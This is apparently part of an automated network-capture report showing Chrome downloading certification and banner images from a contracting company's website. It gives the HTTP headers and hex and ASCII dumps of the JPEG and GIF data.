                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              68192.168.2.465405173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:10 UTC469OUTGET /uploads/certifications/3/b28c762ff89177dacd4852c7b909ca34.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:10 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:10 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 06:39:13 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 45790
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:10 UTC7931INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 0a 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:20:10 UTC8000INData Raw: 56 29 4f 19 ec 25 47 f2 a3 ed a4 0f bb dc 2a ef 45 04 1e 1f 83 c5 ff 00 aa 09 7f e3 47 fd 20 ee 7f 03 84 3f 0e 8f 5f d3 ce 70 cd 18 0c a6 a5 a1 d3 5f 77 b1 03 ed 90 48 1a 9e 1f 37 f0 2e ba 7d 77 47 0c b9 3e 3d 63 23 e2 63 df e6 f8 5d 78 9f e3 1f 8a 9e 86 72 31 c1 8c 6b 18 f7 a0 09 f9 eb 5e c0 81 f5 d1 9c 66 2e 24 11 ec 59 4e 31 f8 88 1e f7 c2 8f e0 b8 7f 08 32 eb 7a 63 20 21 09 99 63 26 c4 b4 d1 f2 ff 00 07 fc 1e 1f 8c e3 9f 59 d7 4a 53 9c a4 62 2a 55 55 fb e8 38 01 03 ec ad 41 07 87 e3 7f 0c cf 97 14 3a df c3 b2 48 ce 38 b1 e4 d8 4f b2 c7 df a1 ae cf 1f fe 5b fd 54 ff 00 0d c9 8b 26 43 ff 00 83 f5 37 02 7c 25 13 56 7f 7e 0f b1 03 ef b7 0f 10 8d f1 f1 0f c7 7f e5 bf f8 6e 2f c4 3a 6c d8 73 de d8 e6 dd e5 35 ae da 79 bf 0d fc 1f a7 ea ba fe a3 a5 c9 bb d3
                                              Data Ascii: V)O%G*EG ?_p_wH7.}wG>=c#c]xr1k^f.$YN12zc !c&YJSb*UU8A:H8O[T&C7|%V~n/:ls5y
                                              2024-09-27 06:20:10 UTC8000INData Raw: aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2e 19 63 46 fc 5d d9 9c 77 0a 40 c2 12 da 6d 33 1b 4d 8f 7b 0e 91 f3 c7 6f 70 e8 80 98 d6 c7 75 c6 68 d7 62 b1 f3 0d bd fb 31 c6 ac 01 22 8d 3c 9f 8b 75 e7 f0 fe 8e 59 e3 f1 01 b6 1f d4 78 fa 39 7b 72 73 7e 2f 8d ff 00 97 4e 29 4b f0 fb 8e bb 25 19 91 ec fd ca 29 87 a9 3f c1 ff 00 0d 39 f2 48 e4 cf 3d a4 99 92 7c d2 e0 7b a3 f7 97 1f d9 3f 12 1d 1f ed ff 00 b5 4f d5 db ea fa 7f 67 6f 35 e1 c7 b2 bb 3e 8f e2 1d 2f fd 6f d0 6d c2 41 32 8c 32 43 da 47 6f ac 3e 4c ff 00 1b cf 1e 8c 7e 1d 2c 33 8f 53 28 fa 22 c5 02 38 b1 ed af 95 f7 60 3d 18 7f e5 c5 03 d2 61 cf 9a 24 cb 24 bd 33 b3 8d c3 df db bb dd ff 00 59 e3 c3 d6 47 a0 31 91 9c c6 e1 21 f0 f7 f9 f6 7e 7b f1 0f c2 33 f4 9f 87 f4 f1 8c 4c e5 8f
                                              Data Ascii: *.cF]w@m3M{opuhb1"<uYx9{rs~/N)K%)?9H=|{?Ogo5>/omA22CGo>L~,3S("8`=a$$3YG1!~{3L
                                              2024-09-27 06:20:10 UTC8000INData Raw: 55 55 01 55 54 05 55 50 15 55 40 51 76 97 9f a4 9f a9 8f 7f 89 97 d6 81 d0 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a ab 12 91 ba 1c a0 5a b0 23 ed 29 89 b4 09 c9 1b 1a 38 70 f5 bc f9 23 b4 fb 1a 80 4f f3 05 fd a4 43 cc 0c 4f c9 80 48 36 1d 25 e6 1b a3 f3 44 33 22 b4 74 1e 68 d7 70 a7 f9 83 4e 58 07 69 b4 03 8c f9 83 53 1a 7b 8a c8 54 81 1c 14 91 66 41 14 bc 62 a2 13 29 88 f2 b2 90 84 4c a4 68 01 64 fb 9f 27 a6 ea ba 9f c4 31 4b a9 c4 46 3c 72 bf 46 26 36 4d 7d a9 7b cf 61 db bb 01 e9 9c de 01 9f 58 f8 3c 9f b7 61 13 8e 19 93 ea 13 b2 46 02 e3 bf 6e e2 3e 8f a3 bb cb 2f c6 7a 7f 4a 59 b1 6e c8 23 5a 08 11 66 46 a2 35 f1 2d 07 ae 33 0e e1 b1 20 78 7c 3c df 89 8c 1e b6 49 59 8e 18 c3 76 31 12 08 c9 2e db bb 8f a9 70 75 b9 23
                                              Data Ascii: UUUTUPU@Qv**Z#)8p#OCOH6%D3"thpNXiS{TfAb)Lhd'1KF<rF&6M}{aX<aFn>/zJYn#ZfF5-3 x|<IYv1.pu#
                                              2024-09-27 06:20:10 UTC8000INData Raw: 93 e0 c4 7a ec 12 8e e1 31 40 4a 47 d8 23 cf d0 e5 1f c3 f6 e0 9e 21 2a 94 cd 99 c4 57 87 e5 e2 f3 8f c1 c8 89 8c 72 90 65 bf 71 11 1c 4e b4 1e 1c 73 aa 07 54 ff 00 11 c2 32 fa 31 37 2d 6f c0 51 03 f5 ed df 46 b1 fe 21 87 26 11 d4 6e ac 67 4b 96 9d e9 c0 7e 19 53 89 de 76 40 99 42 14 34 b9 09 1d 7b ea 1a fd 84 7a 71 c2 32 79 e1 2f 52 12 a1 63 53 56 3b 8d 48 ff 00 34 0d 47 e2 1d 39 94 62 32 0b 9d 18 fc f8 fa 6a bd fa 37 93 ab c3 8f 20 c5 39 81 33 d9 e5 8f e1 f0 c6 0e e9 9b 99 81 24 d6 b2 8c 8c be f2 78 4e 7f c3 e3 d4 4a 52 13 22 19 2b d4 88 a3 66 3c 6b db db ee ec 81 a4 ff 00 11 c3 1c 51 ce 0e ec 72 90 8e e1 ed ee d8 eb b0 1d b5 31 e7 17 1f df b7 cf be 9c b3 93 a3 df 86 18 84 88 38 cc 08 95 7f 0f b1 e6 1f 83 c7 78 99 95 92 41 c9 71 1e 62 0e eb 1e 1a 9f 6f
                                              Data Ascii: z1@JG#!*WreqNsT217-oQF!&ngK~Sv@B4{zq2y/RcSV;H4G9b2j7 93$xNJR"+f<kQr18xAqbo
                                              2024-09-27 06:20:10 UTC5859INData Raw: 5f 72 bf 20 3a 71 11 bf 16 e1 c5 6c 24 1d 78 e3 bb d7 0e b3 ad e9 af cf bc 44 ed 23 26 ba f8 6e 1a fd 6c 79 7d 19 79 ad cf a4 57 ca e9 7f 1a c5 90 88 66 1e 94 cf 1b b5 89 f7 4b f3 a7 d4 79 b4 d6 a6 d3 9d 02 af 1f e2 31 c9 2c 3f ca 04 c8 4a 12 a8 f3 42 42 fe e7 83 ae c5 d5 75 19 7d 5c 11 9c 23 2c 7e 91 12 35 5b 89 b9 55 f3 11 a8 61 4f 6d 5f 03 1f 4d d4 c3 2e 19 6d 99 31 8e 30 77 4b 40 00 f3 79 81 d0 f8 c4 89 6e f1 7a ba 8c 19 25 d4 99 4a 13 9c 4f a7 e8 98 4f 68 85 7c 57 a8 f7 f0 6c 68 81 ea ab e4 42 5f 88 c8 91 23 5e 78 8b 11 1a 47 71 b3 1f 11 b6 b9 ee f3 e5 e9 7a c9 e3 9e 3f 39 3f cc 1b b4 b2 0e 48 91 47 c0 c2 fe a4 0f 7e d5 f2 31 8e ab 14 c4 04 64 31 ee 9d 6d 11 d7 cf a6 ed dc 47 6f 83 9c 7f 6f c8 41 c8 26 22 32 44 d0 11 bd b5 20 41 f1 00 d7 d6 81 ed a6
                                              Data Ascii: _r :ql$xD#&nly}yWfKy1,?JBBu}\#,~5[UaOm_M.m10wK@ynz%JOOh|WlhB_#^xGqz?9?HG~1d1mGooA&"2D A


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              69192.168.2.465404173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:10 UTC469OUTGET /uploads/certifications/2/4e78ca5f7dd4e2d66f3b7d895ae18bd3.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:10 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:10 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 06:39:02 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 47800
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:10 UTC7931INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 0a 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:20:10 UTC8000INData Raw: 60 32 9a 96 87 4d 7d de c4 0f b6 41 20 6a 78 7c df c0 ba e9 f5 dd 1c 32 e4 f8 f5 8c 8f 89 8f 7f 9b e1 75 e2 7f 8c 7e 2a 7a 19 c8 c7 06 31 ac 63 de 80 27 e7 ad 7b 02 07 d7 46 71 98 b8 90 47 b1 65 38 c7 e2 20 7b df 0a 3f 82 e1 fc 20 cb ad e9 8c 80 84 26 65 8c 9b 12 d3 47 cb fc 1f f0 78 7e 33 8e 7d 67 5d 29 4e 72 91 88 a9 55 57 ef a0 e0 04 0f b2 b5 04 1e 1f 8d fc 33 3e 5c 50 eb 7f 0e c9 23 38 e2 c7 93 61 3e cb 1f 7e 86 bb 3c 7f f9 6f f5 53 fc 37 26 2c 99 0f fe 0f d4 dc 09 f0 94 4d 59 fd f8 3e c4 0f be dc 3c 42 37 c7 c4 3f 1d ff 00 96 ff 00 e1 b8 bf 10 e9 b3 61 cf 7b 63 9b 77 94 d6 bb 69 e6 fc 37 f0 7e 9f aa eb fa 8e 97 26 ef 4f 15 ed a9 6b cd 6a 81 f7 7b 87 8a 83 7c 3f 0d f8 c7 4f d3 e3 fc 4b 16 0c e4 c7 a7 86 28 40 ca f5 da 04 ab 5f a1 db f0 18 88 7e 25 28
                                              Data Ascii: `2M}A jx|2u~*z1c'{FqGe8 {? &eGx~3}g])NrUW3>\P#8a>~<oS7&,MY><B7?a{cwi7~&Okj{|?OK(@_~%(
                                              2024-09-27 06:20:10 UTC8000INData Raw: 44 3e 00 7e c7 9b a6 cb 97 ab 94 a3 d7 09 48 88 d5 59 ec 36 d5 73 cf 04 3f 71 f8 2e 4c f9 7a 3c 73 ea 6f d4 23 5b d0 d5 e9 7f 27 b0 e1 c7 29 6f 31 06 5e 35 ab a3 0a 2a aa 80 0b 86 2f 89 da 66 81 73 c3 ca 05 65 e1 18 78 46 63 c3 78 85 45 a0 8c dd 9c e1 f1 0f 7b ae 6e ce 70 f8 82 21 43 43 29 39 ba cb 48 9f 69 72 e5 03 4f 86 1e f6 07 21 ac 9c d7 82 e3 17 24 01 93 e2 29 80 af 31 ec c9 b9 1d 3b 96 a6 6b ca 38 08 00 6b 21 ef 7a 5e 7c 43 cd ee 7a 13 28 aa ab 00 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 1e 37 fe 5c 5d 7e 4e 8f a6 11 c3 fd dc b2 18 e1 ec be ef 27 e2 5d 46 4f c0 fa 08 63 c7 23 3c f3 3b 77 cc ee d6 b5 3a fd 00 27 ff 00 2e ab c6 3a 7e a4 8b 86 2c a0 cb f7 f9 3b ff 00 e5 c7 f8 7c ff 00 11 e9 a3 2e 9f cd 38 1d f1
                                              Data Ascii: D>~HY6s?q.Lz<so#[')o1^5*/fsexFcxE{np!CC)9HirO!$)1;k8k!z^|Cz(**7\]~N']FOc#<;w:'.:~,;|.8
                                              2024-09-27 06:20:10 UTC8000INData Raw: 64 34 35 ee db 13 e4 0a b4 00 7b 08 94 9b b1 48 38 62 7b 57 b9 63 0d a6 ec 9f 7a 06 8a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 44 86 a0 f8 34 0a 5c 8e 42 4d 40 5f b7 b2 05 6b ba fb 36 e4 21 22 6c 9d 47 67 54 05 55 50 26 62 c1 0e 11 96 d3 6f 4b cd 31 45 a8 07 24 6b 51 c1 5c 7a dc 7c 56 12 fb 27 82 82 0c 24 88 4b 63 cd 1a ee 17 20 a3 63 82 cc 4e d3 6d 00 77 06 e8 b8 c8 51 a6 e0 74 1e c2 c0 66 ef 8b e1 72 9e 92 2e d8 f4 88 4c a5 a0 8b 14 52 ac 07 31 06 05 de 24 48 22 70 dc 3d ae 31 91 81 68 0e 48 6d 3e c6 1e 9d 24 3d 8e 13 81 89 f6 22 12 aa ad 05 e2 f8 9e 87 9f 17 c4 f4 39 28 aa aa 02 aa a8 0b cb 2e 4b d4 f2 cb 92 d4 00 aa ad 20 ba 63 85 ea 51 08 5e a7 87 69 11 11 65 80 13 96 d1 ed 71 84 77 1d 56 cc cb
                                              Data Ascii: d45{H8b{Wcz**D4\BM@_k6!"lGgTUP&boK1E$kQ\z|V'$Kc cNmwQtfr.LR1$H"p=1hHm>$="9(.K cQ^ieqwV
                                              2024-09-27 06:20:10 UTC8000INData Raw: 6c 90 84 65 11 1a d2 32 de 47 3f 6e 5f 17 7d 39 4f fd 53 fc b8 c7 7f 9b d5 f5 f2 4b 6f c6 77 6e ae 78 1a 7f c9 7d 45 40 f0 cf e0 04 e3 8e 3f 58 e9 09 e3 91 db cf a9 31 29 1e 79 97 c2 7d 8d f5 5f 87 48 e2 cb 82 37 2c 9d 44 a5 2f 52 bc b0 1a 50 3e c0 00 03 c5 f6 55 03 9b 2f 4f 93 d2 38 f0 4c 42 67 99 ed be 79 35 a6 af 1e 4f c1 fd 58 46 13 9d 11 09 62 96 c8 ed 1b 64 41 34 35 ab aa ef a1 3d df 55 50 38 23 d1 e6 8e 59 64 f5 23 5b 4c 71 c7 d3 f8 3c 35 dd c7 72 34 bd 35 a0 ed d3 74 a3 0c a7 94 eb 93 21 89 99 1a 0f 28 ad 03 d2 a8 18 75 79 7d 2c 52 9f 70 34 f7 bf 34 7c a3 5e cf b1 f8 be 5d 23 8b c4 ee 3f 27 c1 ea e7 b7 19 f1 3a 35 29 65 4a 5a 47 9b 29 6f 91 91 ee 6d 01 09 0f ac f7 9f a2 aa ab e3 3e 78 ab cf d4 75 90 e9 e5 18 c8 48 ca 57 42 11 32 3a 73 c3 97 fd 63
                                              Data Ascii: le2G?n_}9OSKownx}E@?X1)y}_H7,D/RP>U/O8LBgy5OXFbdA45=UP8#Yd#[Lq<5r45t!(uy},Rp44|^]#?':5)eJZG)om>xuHWB2:sc
                                              2024-09-27 06:20:10 UTC7869INData Raw: d6 9c 3d 9d 67 43 fb 2e 09 e7 84 80 94 46 9b 63 fa 9d c5 da ca 9d 70 23 b1 ce 71 1e a3 f9 7b 49 12 fb 3c 4a 43 ff 00 23 1f f1 1f f4 82 93 78 ae 32 07 6c 7d 9a c7 fa 87 d5 21 e5 2e bf f9 6e 13 21 9a 52 36 4c a3 64 f3 c3 8f fe 5c 32 96 3c f8 e7 02 63 21 03 a8 f7 bd bd b4 fd 06 39 3f 88 b1 e6 16 35 1e c6 21 38 e5 06 b5 1a c4 82 1e a3 d0 5e 0f 5e e2 4e cd e7 74 3d 97 cc 76 bc 32 cb 0c 32 db c0 32 3e da 0f 07 95 0b 0c 59 b5 63 33 8c 62 ac 52 27 d2 27 f9 72 ef 8e 5d 85 ff 00 d1 3d b8 72 84 cf 47 ba 32 a8 8b f8 a5 a4 07 bb ed 4e 47 ed 4b c5 eb dd 8f 3c 76 4b 89 83 a7 77 9a 46 52 80 9c 8e dc 98 c9 c7 92 60 79 8d 71 5c fc 5a 1d 35 72 ba 32 98 f5 dd 2e df 3e 28 81 01 ac 8d f8 be 7b ed 91 1c f8 ab 20 32 90 16 63 f0 ca c7 b1 f1 48 31 34 45 1f 02 fb b2 2d 35 e2 f5 47
                                              Data Ascii: =gC.Fcp#q{I<JC#x2l}!.n!R6Ld\2<c!9?5!8^^Nt=v222>Yc3bR''r]=rG2NGK<vKwFR`yq\Z5r2.>({ 2cH14E-5G


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              70192.168.2.465406173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:10 UTC462OUTGET /uploads/dynamic/9/296e3d1f4ce8845a75130582a997c1a7.gif HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:10 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:10 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 12:02:55 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 476463
                                              Connection: close
                                              Content-Type: image/gif
                                              2024-09-27 06:20:10 UTC7931INData Raw: 47 49 46 38 39 61 00 05 58 02 f7 00 00 78 78 78 77 77 77 75 75 75 c2 c2 c2 76 76 76 c3 c3 c3 74 74 74 8c 8c 8c c1 c1 c1 bd bd bd 8b 8b 8b 73 73 73 ac ac ac c0 c0 c0 bf bf bf ad ad ad 8a 8a 8a a8 a8 a8 79 79 79 be be be 8d 8d 8d aa aa aa 72 72 72 a7 a7 a7 bc bc bc 8f 8f 8f af af af c4 c4 c4 b0 b0 b0 ab ab ab a9 a9 a9 89 89 89 a4 a4 a4 a3 a3 a3 ae ae ae a5 a5 a5 a6 a6 a6 88 88 88 8e 8e 8e bb bb bb 90 90 90 71 71 71 70 70 70 9f 9f 9f 87 87 87 a2 a2 a2 86 86 86 91 91 91 a1 a1 a1 93 93 93 b1 b1 b1 92 92 92 b9 b9 b9 85 85 85 97 97 97 9a 9a 9a ba ba ba 84 84 84 7a 7a 7a 94 94 94 99 99 99 b8 b8 b8 7b 7b 7b c5 c5 c5 98 98 98 a0 a0 a0 9d 9d 9d 81 81 81 82 82 82 9c 9c 9c b7 b7 b7 7f 7f 7f 6e 6e 6e 9e 9e 9e 6f 6f 6f b4 b4 b4 7e 7e 7e b2 b2 b2 96 96 96 9b 9b 9b b5 b5
                                              Data Ascii: GIF89aXxxxwwwuuuvvvtttsssyyyrrrqqqpppzzz{{{nnnooo~~~
                                              2024-09-27 06:20:10 UTC8000INData Raw: 21 1a 30 68 00 81 0d 6e 72 f1 27 a0 02 49 a4 92 4e 3c 09 05 c4 54 62 96 39 95 97 43 e9 a4 92 44 84 4a 2a 8f 3a 74 22 63 ae be 1c 48 a0 21 1a 8c 40 a9 b0 35 0f eb a0 82 08 2e 20 e1 c7 16 e4 dc 2d 88 8d ab 16 ff 94 36 ac 83 c0 8d c8 11 48 60 12 ca 07 a8 b4 12 25 29 b8 c4 60 82 8b 10 08 eb 87 b3 c8 00 23 8f 9e 82 1a 2a 11 ba 57 ae e4 6e 9c f1 ce 39 e7 a2 8c 42 4a a9 a6 98 f2 e9 a8 a2 84 b2 bb e5 9a 53 81 c5 15 57 5e 61 fc 15 55 54 31 65 72 53 2c b1 fc 72 cc 33 d7 5c 73 4a 3a f7 fc 73 cf 19 11 7d 74 46 3e b7 a4 f3 cb 29 9f 5c 95 57 5a 67 9c 71 58 62 77 25 76 99 6d c6 39 90 a4 f0 a0 8a 8c 1f b4 42 c0 a3 8f 8c 58 c2 0a 19 44 38 cc 83 a7 43 a8 ed d0 de 7a b3 f3 37 e8 6f 90 7e fa 27 84 90 6d be 16 80 24 81 a0 82 a0 28 1a 07 8f d0 f6 eb 2b b5 b5 12 ab 2c 9c e2 9a
                                              Data Ascii: !0hnr'IN<Tb9CDJ*:t"cH!@5. -6H`%)`#*Wn9BJSW^aUT1erS,r3\sJ:s}tF>)\WZgqXbw%vm9BXD8Cz7o~'m$(+,
                                              2024-09-27 06:20:10 UTC8000INData Raw: 22 19 04 22 d1 ff 00 6c 4a 41 10 90 00 12 fc 13 1a f4 01 27 08 42 18 d8 41 1a fc 93 17 d4 86 05 e0 06 01 10 80 00 98 88 59 a9 81 1a a4 88 12 ee c1 1b c0 41 1a 00 40 06 bc 00 02 ba c0 0b 44 40 0f 34 80 2b c0 03 3a 80 43 38 84 83 3a 7c 43 39 94 83 3b 9c 03 19 60 80 04 d8 41 18 04 80 09 90 1b b9 69 25 a1 28 47 73 90 64 68 89 96 4d 99 d6 69 c9 60 61 aa 56 0d 12 e6 b8 65 e5 0c 30 47 a9 4c 54 67 7c 86 04 80 69 59 29 41 17 d0 01 99 a2 01 12 2a a1 71 2d 02 27 6c 42 24 60 02 28 14 82 28 cc 02 2d dc 82 2e c8 8b 30 20 43 34 30 43 b9 78 61 b3 54 43 35 28 83 b0 02 eb 77 85 0b 1b 4a c3 1b 3a 83 7a b1 d7 1c 06 43 30 c0 d7 1d ee 82 b0 e0 02 2d d4 d7 7d 01 62 bf 94 42 c0 14 62 21 18 e2 21 26 a2 80 85 ab b8 16 18 24 46 62 c5 48 42 23 6c 02 7f 0a c2 1d d8 53 1a cc 01 1d 70
                                              Data Ascii: ""lJA'BAYA@D@4+:C8:|C9;`Ai%(GsdhMi`aVe0GLTg|iY)A*q-'lB$`((-.0 C40CxaTC5(wJ:zC0-}bBb!!&$FbHB#lSp
                                              2024-09-27 06:20:10 UTC8000INData Raw: 49 64 91 46 0e e2 47 92 7e 14 52 c8 28 4e 3a 09 4a 94 51 7e 42 a5 26 56 5e 89 65 96 59 5e c2 65 97 97 68 c2 e5 24 98 64 a2 c8 1e 6f 6c 61 07 1b 73 78 51 45 15 0b d0 24 41 7d 54 3c e5 82 0b 25 40 80 67 55 07 1c 40 01 05 7b 2a 50 82 0b 50 11 41 45 52 47 20 65 9f 51 57 9c 94 c5 51 4c 20 95 d4 10 43 4c 91 43 0e 51 4d 55 55 9f ab bd b0 95 13 51 00 c1 c3 13 45 08 91 44 10 62 85 10 02 08 8f 5d 50 81 5a 6b b1 e5 96 06 83 c9 f0 97 5e 73 dd 25 85 11 3d f4 40 03 0d 38 fc fa eb 09 27 60 40 2c 06 09 1c 3b 41 b2 ca 3a e0 40 03 ce 3e eb 2c 02 03 14 b0 c1 06 3f 8c 31 86 16 60 d4 81 c7 1f 7a fc 11 48 ff 25 95 74 12 4a 2a b0 b8 f2 ca 2b aa 58 42 09 25 8c ac 42 0c bc db cc 3b 2f 37 dc d0 8b 2f 31 fa ae c2 ef 2a 8c b4 6b 49 c0 aa a4 eb 0a 2c 06 a7 12 8a 27 9d 88 9b 48 20 7f
                                              Data Ascii: IdFG~R(N:JQ~B&V^eY^eh$dolasxQE$A}T<%@gU@{*PPAERG eQWQL CLCQMUUQEDb]PZk^s%=@8'`@,;A:@>,?1`zH%tJ*+XB%B;/7/1*kI,'H
                                              2024-09-27 06:20:10 UTC8000INData Raw: 7e 39 2d de ea ad b0 03 3b fd 13 19 93 19 90 02 40 00 fd 30 a9 9a c9 99 2e d2 2e ee 7a 80 96 aa bb 08 a8 0e 98 52 4d d5 b4 0e c1 bb 2c cc 2a c2 d8 34 4d ec 10 92 77 42 3c 85 b0 a3 9e fa a9 26 91 12 1b 88 82 16 eb b8 0f 18 93 1c 98 46 67 74 2a 43 4b 81 a9 41 02 aa fa 33 d1 db 13 45 c9 13 d4 13 be e9 84 94 df b3 ce fb 5a 3d d5 f3 2f d9 7b bd 4a 71 3d dd b1 13 e6 e4 8b e3 53 be e8 7c ce 06 2a bd f4 ff ec aa 06 c2 45 f5 24 bd bb 39 94 d5 59 94 f1 ac 4e d6 93 1d 00 43 95 05 78 15 5b b9 95 62 1c 0c 91 d3 26 db e0 ca 66 42 a7 22 68 cb 11 88 27 79 6a 42 2a 5c 02 f1 a3 01 d1 72 00 04 d8 ba 7f 09 3b 8e d1 ad fc fb 98 91 d1 cc 95 41 00 f8 c0 80 9b 31 82 cf b2 82 12 d4 80 79 e2 0e cf 1a 0f 1c 48 80 08 d5 17 32 80 91 3a c8 03 0a c9 90 0d 09 05 11 29 11 4f 80 98 0b b9
                                              Data Ascii: ~9-;@0..zRM,*4MwB<&Fgt*CKA3EZ=/{Jq=S|*E$9YNCx[b&fB"h'yjB*\r;A1yH2:)O
